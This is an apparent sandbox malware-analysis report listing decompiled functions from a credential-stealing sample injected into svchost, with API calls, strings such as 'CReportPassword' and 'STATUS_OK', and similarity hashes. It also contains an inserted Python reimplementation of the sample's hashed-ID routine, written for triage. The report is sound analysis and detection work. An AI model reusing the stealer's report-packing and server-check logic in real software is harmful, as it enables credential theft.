• lstrlenA.KERNEL32(http://), ref: 0BC06B77
• StrCmpNIA.SHLWAPI(?,http://,00000000), ref: 0BC06B7E
• lstrlenA.KERNEL32(https://), ref: 0BC06B8A
• StrCmpNIA.SHLWAPI(?,https://,00000000), ref: 0BC06B91
• lstrlenA.KERNEL32(ftp.,?,00000000,?), ref: 0BC06BA0
• StrCmpNIA.SHLWAPI(00000000,ftp.,00000000), ref: 0BC06BA9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$AddressAllocHandleLocalModuleProc
• String ID: ftp.$ftp://$http://$https://
• API String ID: 3606698760-2878239594
• Opcode ID: 06383c07d904a962e8bc3e0e2dcd87f0f67ae5b847eaf504374533e976265dad
• Instruction ID: 676f4aa3000d4386d14c3560e738b3000b97feadb63eea3f19cef7d832ceb7e2
• Opcode Fuzzy Hash: 06383c07d904a962e8bc3e0e2dcd87f0f67ae5b847eaf504374533e976265dad
• Instruction Fuzzy Hash: 73413D71A3111A9BCF11EFA5DD819AF77B9EF40354B104424E805B7290EF30EE65AAA1
Uniqueness
Uniqueness Score: 100.00%

C-Code - Quality: 96%
			E0BC02D22(void* _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				char _v8;
				char* _v12;
				void* _v16;
				CHAR* _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				void* __esi;
				void* _t53;
				intOrPtr _t58;
				intOrPtr _t72;
				void* _t91;
				CHAR* _t93;
				CHAR* _t94;
				char _t95;
				intOrPtr _t107;
				CHAR* _t110;
				void* _t117;
				void* _t119;
				void* _t126;

				_t95 = _a16;
				_t91 = 0;
				if(_t95 == 0) {
					L26:
					return _t53;
				}
				_t53 =  *0xbc10d60; // 0x1
				if(_t53 >= _t95) {
					goto L26;
				}
				_t126 =  *0xbc10d40 - _t95; // 0x5
				if(_t126 >= 0) {
					goto L26;
				}
				_t107 =  *0xbc10d18; // 0x3
				if(_t107 >= _t95) {
					L25:
					goto L26;
				}
				E0BC0326D(_t53,  &_a16,  &_v28,  &_v24, _a12);
				E0BC0326D(_t107,  &_v8,  &_v28,  &_v20, _a12);
				if(lstrcmpA(_v20, " ") == 0 || _v8 == 0) {
					_v8 = 3;
					_v20 = "no";
                                                                                                                                        				}
                                                                                                                                        				_t58 =  *0xbc10d40; // 0x5
                                                                                                                                        				_t100 =  &_v16;
                                                                                                                                        				E0BC0326D(_t58,  &_v16,  &_v12,  &_v28, _a12);
                                                                                                                                        				_t117 = _v16;
                                                                                                                                        				_t109 = _v28;
                                                                                                                                        				_v44 = _t117;
                                                                                                                                        				_v40 = _v28;
                                                                                                                                        				_v32 = _t91;
                                                                                                                                        				_t53 = E0BC01000( &_v44, _t91,  &_v36);
                                                                                                                                        				if(_t53 == 0 || _v32 == _t91) {
                                                                                                                                        					L24:
                                                                                                                                        					goto L25;
                                                                                                                                        				} else {
                                                                                                                                        					_t53 = _v36;
                                                                                                                                        					if(_t53 > _t117) {
                                                                                                                                        						goto L24;
                                                                                                                                        					}
                                                                                                                                        					E0BC08D5E(_t53 + 1, _t109, _t91, _t53 + 1);
                                                                                                                                        					E0BC08D91(_v32, _t109, _v36);
                                                                                                                                        					_t119 = _v36;
                                                                                                                                        					_v16 = _t119;
                                                                                                                                        					_t53 = LocalFree(_v32);
                                                                                                                                        					if(_a16 == _t91 || _t119 == _t91) {
                                                                                                                                        						goto L24;
                                                                                                                                        					} else {
                                                                                                                                        						_v12 = E0BC08D51(_a16);
                                                                                                                                        						E0BC08D91(_v24, _t66, _a16);
                                                                                                                                        						_t110 = "ftp://";
                                                                                                                                        						if(StrCmpNIA(_v12, _t110, lstrlenA(_t110)) == _t91) {
                                                                                                                                        							L16:
                                                                                                                                        							E0BC08C37(_a20);
                                                                                                                                        							_t72 =  *0xbc10d48; // 0x1
                                                                                                                                        							E0BC08C37(_t72);
                                                                                                                                        							E0BC08C37(_a16);
                                                                                                                                        							_t76 = _v24;
                                                                                                                                        							if(_v24 != _t91) {
                                                                                                                                        								E0BC08C4D(_t76, _t100, _a16);
                                                                                                                                        								_pop(_t100);
                                                                                                                                        							}
                                                                                                                                        							E0BC08C37(_v8);
                                                                                                                                        							if(_v8 != _t91) {
                                                                                                                                        								_t83 = _v20;
                                                                                                                                        								if(_v20 != _t91) {
                                                                                                                                        									E0BC08C4D(_t83, _t100, _v8);
                                                                                                                                        									_pop(_t100);
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							E0BC08C37(_v16);
                                                                                                                                        							_t81 = _v28;
                                                                                                                                        							if(_v28 != _t91) {
                                                                                                                                        								E0BC08C4D(_t81, _t100, _v16);
                                                                                                                                        							}
                                                                                                                                        							L23:
                                                                                                                                        							_t53 = E0BC08D3D(_v12);
                                                                                                                                        							goto L24;
                                                                                                                                        						}
                                                                                                                                        						_t93 = "http://";
                                                                                                                                        						if(StrCmpNIA(_v12, _t93, lstrlenA(_t93)) == 0) {
                                                                                                                                        							L15:
                                                                                                                                        							_t91 = 0;
                                                                                                                                        							goto L16;
                                                                                                                                        						}
                                                                                                                                        						_t94 = "https://";
                                                                                                                                        						if(StrCmpNIA(_v12, _t94, lstrlenA(_t94)) != 0) {
                                                                                                                                        							goto L23;
                                                                                                                                        						}
                                                                                                                                        						goto L15;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}



























APIs
• lstrcmpA.KERNEL32(?,0BC0D7DC), ref: 0BC02D8D
• LocalFree.KERNEL32(?,?,?,?,?,00000000,?), ref: 0BC02E1A
• lstrlenA.KERNEL32(ftp://,?,00000000,?), ref: 0BC02E54
• StrCmpNIA.SHLWAPI(?,ftp://,00000000), ref: 0BC02E61
• lstrlenA.KERNEL32(http://), ref: 0BC02E6D
• StrCmpNIA.SHLWAPI(?,http://,00000000), ref: 0BC02E74
• lstrlenA.KERNEL32(https://), ref: 0BC02E80
• StrCmpNIA.SHLWAPI(?,https://,00000000), ref: 0BC02E87
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$FreeLocallstrcmp
• String ID: ftp://$http://$https://
• API String ID: 3486702906-2804853444
• Opcode ID: b7576b877c08da18b120b43c3da25497741b062bf176d9046481ffaa7ff454e5
• Instruction ID: c13d4c13146222b9501ad0a1663472adb91a1f4194607a0c8b1a88e7ddfd74eb
• Opcode Fuzzy Hash: b7576b877c08da18b120b43c3da25497741b062bf176d9046481ffaa7ff454e5
• Instruction Fuzzy Hash: 5F515B7193025EAFCF10EF94DC859AEBBB9FF14205B104425E911BB190DF30AE41EBA0
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 87%
			E0BC09539(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v276;
				intOrPtr _v280;
				signed int _v284;
				void* _v288;
				intOrPtr _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void** _t19;
				intOrPtr _t25;
				void* _t26;
                                                                                                                                        				void* _t47;
                                                                                                                                        				intOrPtr _t48;
                                                                                                                                        				signed int _t50;
                                                                                                                                        
                                                                                                                                        				_t47 = __edx;
                                                                                                                                        				_t42 = __ecx;
                                                                                                                                        				_t17 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t17 ^ _t50;
                                                                                                                                        				_v284 = _v284 & 0x00000000;
                                                                                                                                        				_t19 =  &_v288;
                                                                                                                                        				_t48 = __ecx;
                                                                                                                                        				__imp__GetHGlobalFromStream(__ecx, _t19);
                                                                                                                                        				if(_t19 >= 0) {
                                                                                                                                        					_t25 = E0BC089A1(__ecx, __ecx);
                                                                                                                                        					_t49 = _t25;
                                                                                                                                        					_v292 = _t25;
                                                                                                                                        					_t26 = GlobalLock(_v288);
                                                                                                                                        					_t40 = _t26;
                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                        						_v280 = E0BC08D51(_t49);
                                                                                                                                        						E0BC08D91(_t40, _t28, _t49);
                                                                                                                                        						GlobalUnlock(_v288);
                                                                                                                                        						E0BC094CA(E0BC09469( &_v276, _t42, "CReportPassword", lstrlenA("CReportPassword")), _t42, _v280, _t49);
                                                                                                                                        						_t49 = _t48;
                                                                                                                                        						E0BC08B39(_t48);
                                                                                                                                        						_t40 = "NCRYPTED";
                                                                                                                                        						E0BC08A41("NCRYPTED", _t42, _t48, 8);
                                                                                                                                        						_v284 = E0BC08C4D(_v280, _t42, _v292);
                                                                                                                                        						E0BC08D3D(_v280);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				E0BC08B27(_t48);
                                                                                                                                        				return E0BC09FDC(_v284, _t40, _v8 ^ _t50, _t47, _t48, _t49);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,1.00), ref: 0BC09560
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC09583
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000), ref: 0BC095AE
                                                                                                                                        • lstrlenA.KERNEL32(CReportPassword), ref: 0BC095BA
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AddressAllocFreeFromHandleLockModuleProcStreamUnlocklstrlen
                                                                                                                                        • String ID: 1.00$CReportPassword$NCRYPTED
                                                                                                                                        • API String ID: 631361431-2696888955
                                                                                                                                        • Opcode ID: 7047a5cec0e03cc88bdaf4bdbfa1f6a488eec97bb42d7d5d0f49943177eb25d6
                                                                                                                                        • Instruction ID: d707890b69d94be1d190dbc399f58090d71686cc8ec3286b99f79195f6c950ae
                                                                                                                                        • Opcode Fuzzy Hash: 7047a5cec0e03cc88bdaf4bdbfa1f6a488eec97bb42d7d5d0f49943177eb25d6
                                                                                                                                        • Instruction Fuzzy Hash: 93216671A3021C5FCF256B64DC86BDE77B8EF05710F0045D5E609A2281DF749E81AEA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.20%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08FF4(void** __esi, CHAR* _a4) {
                                                                                                                                        				void* _t9;
                                                                                                                                        				void* _t13;
                                                                                                                                        				void* _t17;
                                                                                                                                        				void* _t21;
                                                                                                                                        				void** _t24;
                                                                                                                                        
                                                                                                                                        				_t24 = __esi;
                                                                                                                                        				E0BC08D5E(_t9, __esi, 0, 0x10);
                                                                                                                                        				_t21 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
                                                                                                                                        				 *__esi = _t21;
                                                                                                                                        				if(_t21 != 0xffffffff) {
                                                                                                                                        					__esi[3] = GetFileSize(_t21, 0);
                                                                                                                                        					_t13 = CreateFileMappingA(_t21, 0, 2, 0, 0, 0);
                                                                                                                                        					if(_t13 == 0) {
                                                                                                                                        						CloseHandle(_t21);
                                                                                                                                        						L6:
                                                                                                                                        						 *_t24 =  *_t24 | 0xffffffff;
                                                                                                                                        						L7:
                                                                                                                                        						return 0 | _t24[2] != 0x00000000;
                                                                                                                                        					}
                                                                                                                                        					__esi[1] = _t13;
                                                                                                                                        					_t17 = MapViewOfFile(_t13, 4, 0, 0, 0);
                                                                                                                                        					__esi[2] = _t17;
                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                        						goto L7;
                                                                                                                                        					}
                                                                                                                                        					CloseHandle(__esi[1]);
                                                                                                                                        					CloseHandle( *__esi);
                                                                                                                                        					goto L6;
                                                                                                                                        				}
                                                                                                                                        				return 0;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000010,00000000,?,?,0BC01F2C,00000000), ref: 0BC09013
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0BC01F2C,00000000), ref: 0BC09028
                                                                                                                                        • CreateFileMappingA.KERNEL32 ref: 0BC09038
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,0BC01F2C,00000000), ref: 0BC0904B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,0BC01F2C,00000000), ref: 0BC09061
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,0BC01F2C,00000000), ref: 0BC09065
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandle$MappingSizeView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2246244431-0
                                                                                                                                        • Opcode ID: 87e5469fc0ae866301d7b42231647d66ee5bd60514acd9199fa6a6c66c0c95f9
                                                                                                                                        • Instruction ID: c5c0e31b742801adaa015f9beca2a2680c6232918ca1c775bea88dc5848049e4
                                                                                                                                        • Opcode Fuzzy Hash: 87e5469fc0ae866301d7b42231647d66ee5bd60514acd9199fa6a6c66c0c95f9
                                                                                                                                        • Instruction Fuzzy Hash: E4112D70520641BED6301B76EC8DF177EFCEBCAB28F208A1DF2A6911D1DA719640CA24
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.16%

C-Code - Quality: 95%
			E0BC04F4F(WCHAR* __ecx, void* __edx, CHAR* _a4) {
				signed int _v8;
				char _v12;
				char _v32;
				char _v160;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				signed char _v253;
				CHAR* _v260;
				signed int _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				int _t43;
				signed char _t49;
				intOrPtr _t65;
				CHAR* _t66;
				void* _t73;
				WCHAR* _t74;
				void* _t76;
				signed int _t79;
				void* _t80;

				_t73 = __edx;
				_t40 =  *0xbc10000; // 0xbb40e64e, stack cookie read at function entry
				_v8 = _t40 ^ _t79;
				_t74 = __ecx; // input: wide string to hash
				_v260 = _a4; // output: caller-supplied CHAR buffer that receives the hex string
				_t43 = lstrlenW(__ecx);
				_t65 = 0;
				_t5 = _t43 + 2; // 0x2
				_t76 = _t43 + _t5; // 2*lstrlenW + 2: byte length of the wide string including its 2-byte terminator
				_v252 = 0x67452301; // SHA-1 initial state H0..H4; together with the 20-byte digest
				_v248 = 0xefcdab89; // and the 0x14-iteration hex loop below this identifies the hash as SHA-1
				_v244 = 0x98badcfe;
				_v240 = 0x10325476;
				_v236 = 0xc3d2e1f0;
				_v228 = 0;
				_v232 = 0;
				if(_t76 > 0) {
					do {
						E0BC08768(1,  &_v252, _t65 + _t74); // feed the input one byte at a time (hash update, inferred)
						_t65 = _t65 + 1;
					} while (_t65 < _t76);
				}
				E0BC087FE(_t65, _t74,  &_v252,  &_v32); // finalize: 20-byte digest written to _v32
				_v12 = 0;
				E0BC08D5E( &_v160,  &_v160, 0, 0x80); // clear the 0x80-byte scratch buffer (memset-like by its arguments)
				_v264 = _v264 & 0x00000000; // byte index = 0
				_v253 = 0; // running one-byte sum of the digest
				_t66 = "%s%2.2X"; // append one digest byte as two uppercase hex digits to the output so far
				do {
					_t49 =  *((intOrPtr*)(_t79 + _v264 - 0x1c)); // digest[_v264]
					_v253 = _v253 + _t49;
					wsprintfA( &_v160, _t66, _v260, _t49 & 0x000000ff);
					_t80 = _t80 + 0x10; // cdecl stack cleanup for the four wsprintfA arguments
					lstrcpyA(_v260,  &_v160); // copy scratch back into the output buffer
					_v264 = _v264 + 1;
				} while (_v264 < 0x14); // 20 digest bytes -> 40 hex characters
				wsprintfA( &_v160, _t66, _v260, _v253 & 0x000000ff); // 21st pair: checksum byte (sum of digest mod 256), 42 characters in total
				return E0BC09FDC(lstrcpyA(_v260,  &_v160), _t66, _v8 ^ _t79, _t73, lstrcpyA, wsprintfA); // stack-cookie check epilogue
			}

Address column for the listing above (one entry per C line, spilled by extraction): 0x0bc04f4f through 0x0bc0509a.

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcpywsprintf$lstrlen
• String ID: %s%2.2X
• API String ID: 2096257294-1682948137
• Opcode ID: 711bf3937afca3ddd4eb9fe0e245c113b6c9a1482a1f98972c45afc74eb7996c
• Instruction ID: 3e0829cf73d18436222062265a51f12dfe80f85fbd99150cccf6f58dda5ae8c5
• Opcode Fuzzy Hash: 711bf3937afca3ddd4eb9fe0e245c113b6c9a1482a1f98972c45afc74eb7996c
• Instruction Fuzzy Hash: CE312A71C202299FDB21DB68CC80BEEBBB9EB14304F4140E6E559A7241EA719F849F60
Uniqueness

Uniqueness Score: 1.25%
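Worked reimplementation of the E0BC04F4F routine above, added here as an editor's example; it is not code from the report or from the sample. It assumes that E0BC08768/E0BC087FE are SHA-1 update and finalize (inferred from the five initial-state constants and the 20-byte digest loop) and that the input is hashed as UTF-16LE bytes including the terminator, which is what the 2*lstrlenW+2 byte count implies. The sample strings are constructed, and the looks_like_hex_id triage helper is an addition that goes beyond the listing: it uses the checksum relation to filter candidate 42-character names found on a host.

```python
import hashlib

# Constructed sample inputs (not taken from the report); the real argument
# passed to E0BC04F4F is not visible in this section of the listing.
SAMPLE_INPUTS = ["abc", "Software\\Microsoft\\Windows"]


def encode_digest_with_checksum(data: bytes) -> str:
    """Mirror of the hex loop: 20 digest bytes as uppercase hex pairs
    ("%2.2X"), then one extra pair holding the byte-wise sum of the
    digest modulo 256 (the _v253 accumulator in the listing)."""
    # Assumption: E0BC08768/E0BC087FE implement SHA-1 (IVs 67452301 .. c3d2e1f0).
    digest = hashlib.sha1(data).digest()
    checksum = sum(digest) & 0xFF
    return "".join("%2.2X" % b for b in digest) + "%2.2X" % checksum


def derive_hex_id(text: str) -> str:
    """Hash a string the way the listing feeds it: the WCHAR buffer as
    UTF-16LE bytes, 2*lstrlenW + 2 bytes, i.e. including the terminator."""
    return encode_digest_with_checksum(text.encode("utf-16-le") + b"\x00\x00")


def looks_like_hex_id(candidate: str) -> bool:
    """Triage helper (editor's addition): does a 42-character hex string
    satisfy the checksum relation produced by this routine? A cheap filter
    for file, registry or mutex names collected from a suspect host."""
    if len(candidate) != 42:
        return False
    try:
        raw = bytes.fromhex(candidate)
    except ValueError:
        return False
    return raw[20] == (sum(raw[:20]) & 0xFF)


if __name__ == "__main__":
    for s in SAMPLE_INPUTS:
        print(f"{s!r} -> {derive_hex_id(s)}")
```

The checksum byte carries no secret; it only lets the malware (or an analyst) reject a mangled string cheaply. A match from looks_like_hex_id is a lead for a pivot, not proof of infection, because any 42-character hex string has a 1 in 256 chance of satisfying the relation by accident.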

C-Code - Quality: 83%
			E0BC0962F(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v276;
				long _v280;
				void* _v284;
				intOrPtr _v288;
				signed int _v292;
				intOrPtr _v296;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void** _t27;
				intOrPtr _t33;
				void* _t34;
				void* _t54;
				intOrPtr _t55;
				signed int _t57;

				_t54 = __edx;
				_t49 = __ecx;
				_t22 =  *0xbc10000; // 0xbb40e64e, same stack-cookie global as in E0BC04F4F
				_v8 = _t22 ^ _t57;
				_v292 = _v292 & 0x00000000; // result value, returned at the end
				_t55 = __ecx; // IStream* (first argument to GetHGlobalFromStream below)
				_v280 = GetTickCount(); // 4-byte value derived from the tick count: rotate left by 11, then NOT
				asm("rol eax, 0xb");
				_v280 =  !_v280; // the decompiler renders the NOT as "!"
				_t27 =  &_v284;
				__imp__GetHGlobalFromStream(_t55, _t27); // HGLOBAL backing the stream is returned in _v284
				if(_t27 >= 0) {
					_t33 = E0BC089A1(_t55, _t49);
					_t56 = _t33; // size used for the allocation and copy below
					_v296 = _t33;
					_t34 = GlobalLock(_v284);
					_t48 = _t34;
					if(_t34 != 0) {
						_v288 = E0BC08D51(_t56); // LocalAlloc wrapper (see subcall list)
						E0BC08D91(_t48, _t36, _t56); // copy via ntdll memmove resolved at run time with GetModuleHandleA/GetProcAddress; _t36 is undeclared in the listing (decompiler artifact)
						GlobalUnlock(_v284);
						E0BC094CA(E0BC09469( &_v276, _t49,  &_v280, 4), _t49, _v288, _t56); // the 4-byte tick-derived value and the copied buffer are handed to unnamed routines
						_t56 = _t55;
						E0BC08B39(_t55);
						_t48 =  &_v280;
						E0BC08A41( &_v280, _t49, _t55, 4); // the same 4-byte value is passed again together with the stream
						_v292 = E0BC08C4D(_v288, _t49, _v296);
						E0BC08D3D(_v288); // LocalFree wrapper (see subcall list)
					}
				}
				E0BC08B27(_t55);
				return E0BC09FDC(_v292, _t48, _v8 ^ _t57, _t54, _t55, _t56); // stack-cookie check epilogue
			}

Address column for the listing above (one entry per C line, spilled by extraction): 0x0bc0962f through 0x0bc09739.

APIs
• GetTickCount.KERNEL32 ref: 0BC0964E
• GetHGlobalFromStream.OLE32(?,?), ref: 0BC09673
• GlobalLock.KERNEL32 ref: 0BC09696
  • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
  • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
  • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
• GlobalUnlock.KERNEL32(?,00000000,00000000,00000000), ref: 0BC096BD
  • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$Local$AddressAllocCountFreeFromHandleLockModuleProcStreamTickUnlock
• String ID: 1.00
• API String ID: 642211338-2728340845
• Opcode ID: f8314b9ca7c95b0b182e12541c6c8e5bae01512e0b2d5c3d10800383ee5df74c
• Instruction ID: 9594188d77cc188793f9d7bd72385e176d9af92e852eccf08088d7aab594f433
• Opcode Fuzzy Hash: f8314b9ca7c95b0b182e12541c6c8e5bae01512e0b2d5c3d10800383ee5df74c
• Instruction Fuzzy Hash: 9F214F7192021C9FCF25AB68DC46BDDB7B8EF08710F0041D5A608E2180DF748E859E91
Uniqueness

Uniqueness Score: 1.20%

C-Code - Quality: 85%
			E0BC0914B(CHAR* _a4) {
				int _t7;
				char* _t8;
				char* _t9;
				CHAR* _t16;

				_t16 = E0BC08EE2(0xbc0d832, _a4);
				_t7 = lstrlenA(_a4);
				if(_t7 > 1 &&  *_t16 == 0x22) {
					_push(_t7);
					_t3 =  &(_t16[1]); // 0x1
					_push(_t16);
					E0BC08DBD();
				}
				_t8 = StrStrIA(_t16, ".exe");
				if(_t8 != 0) {
					_t8[4] = 0;
				}
				_t9 = StrRChrIA(_t16, 0, 0x5c);
				if(_t9 == 0) {
					 *_t16 = 0;
				} else {
					 *_t9 = 0;
				}
				if(lstrlenA(_t16) <= 3) {
					 *_t16 = 0;
				}
				return _t16;
			}


APIs
  • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
  • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
  • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
  • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
• lstrlenA.KERNEL32(0BC068DE,00000000,?,?,?,0BC068DE,00000000), ref: 0BC0916A
• StrStrIA.SHLWAPI(00000000,.exe,?,?,?,0BC068DE,00000000), ref: 0BC0918A
• StrRChrIA.SHLWAPI(00000000,00000000,0000005C,?,?,?,0BC068DE,00000000), ref: 0BC0919D
• lstrlenA.KERNEL32(00000000,?,?,?,0BC068DE,00000000), ref: 0BC091AE
  • Part of subcall function 0BC08DBD: GetModuleHandleA.KERNEL32(ntdll.dll,?,0BC021FD,?,?,?), ref: 0BC08DC5
  • Part of subcall function 0BC08DBD: GetProcAddress.KERNEL32(00000000,memcpy), ref: 0BC08DD1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$AddressHandleModuleProclstrcatlstrcpy
• String ID: .exe
• API String ID: 3034646300-4119554291
• Opcode ID: 22a8ef47103fa7b18f288b1a67cac3645652fb596d47da184684b162485914b4
• Instruction ID: 6877c55ffbb657fa5f7315fb1a626d666a9d7bd8c565c41f0b4581f62b9537e2
• Opcode Fuzzy Hash: 22a8ef47103fa7b18f288b1a67cac3645652fb596d47da184684b162485914b4
• Instruction Fuzzy Hash: 96014922276295BED3222BACAC48D9FBFCDDF820507144569F180C71C2CEB28A40C7B1
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 86%
			E0BC010D8(void* __esi, intOrPtr _a4) {
				void* _v8;
				void* __ecx;
				void** _t8;
				void* _t21;
				char* _t22;
				void* _t25;
				void* _t27;
				char* _t28;

				_t8 =  &_v8;
				_t22 = 0;
				_t28 = 0;
				__imp__GetHGlobalFromStream(_a4, _t8, _t27, _t21, _t25);
				if(_t8 >= 0) {
					_t4 = E0BC089A1(_a4, _t25) + 1; // 0x1
					_t28 = E0BC08D51(_t4);
					if(GlobalLock(_v8) != 0) {
						E0BC08D91(_t18, _t28, _t31);
						GlobalUnlock(_v8);
					}
				}
				E0BC08B27(_a4);
				if(_t28 != 0) {
					if(StrStrIA(_t28, "STATUS_OK") != 0) {
						_t22 = 1;
					}
					E0BC08D3D(_t28);
				}
				return _t22;
			}


APIs
• GetHGlobalFromStream.OLE32(?,?,?,00000000,?,?,0BC0138D,?), ref: 0BC010E9
• StrStrIA.SHLWAPI(00000000,STATUS_OK,?,00000000,?,?,0BC0138D,?), ref: 0BC01139
  • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
• GlobalLock.KERNEL32 ref: 0BC0110B
  • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
  • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
• GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,0BC0138D,?), ref: 0BC01120
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$AddressAllocFromHandleLocalLockModuleProcStreamUnlock
• String ID: STATUS_OK
• API String ID: 2225746120-3516785317
• Opcode ID: a6e62e1cd341e8eefdb64749a0c294964da14a123ef0ad67da8e01472476c8e3
• Instruction ID: 55289fbdfa818523daa31d85de2747c0b4a240b1830fb34675d1da2e03028954
• Opcode Fuzzy Hash: a6e62e1cd341e8eefdb64749a0c294964da14a123ef0ad67da8e01472476c8e3
• Instruction Fuzzy Hash: 7101D132234205BF9F116FA5DC89DAFBBFDEE856947054239F902E20C0DF74DA01AA60
Uniqueness

Uniqueness Score: 1.18%

C-Code - Quality: 100%
			E0BC08F32(CHAR* _a4, CHAR* _a8) {
				int _t13;
				CHAR* _t25;

				if(_a4 == 0) {
					_a4 = 0xbc0d832;
				}
				if(_a8 == 0) {
					_a8 = 0xbc0d832;
				}
				_t13 = lstrlenA(_a4);
				_t25 = E0BC08D51(lstrlenA(_a8) + _t13 + 1);
				lstrcpyA(_t25, _a4);
				lstrcatA(_t25, _a8);
				if(_a4 != 0xbc0d832) {
					E0BC08D3D(_a4);
				}
				return _t25;
			}

APIs
• lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
• lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
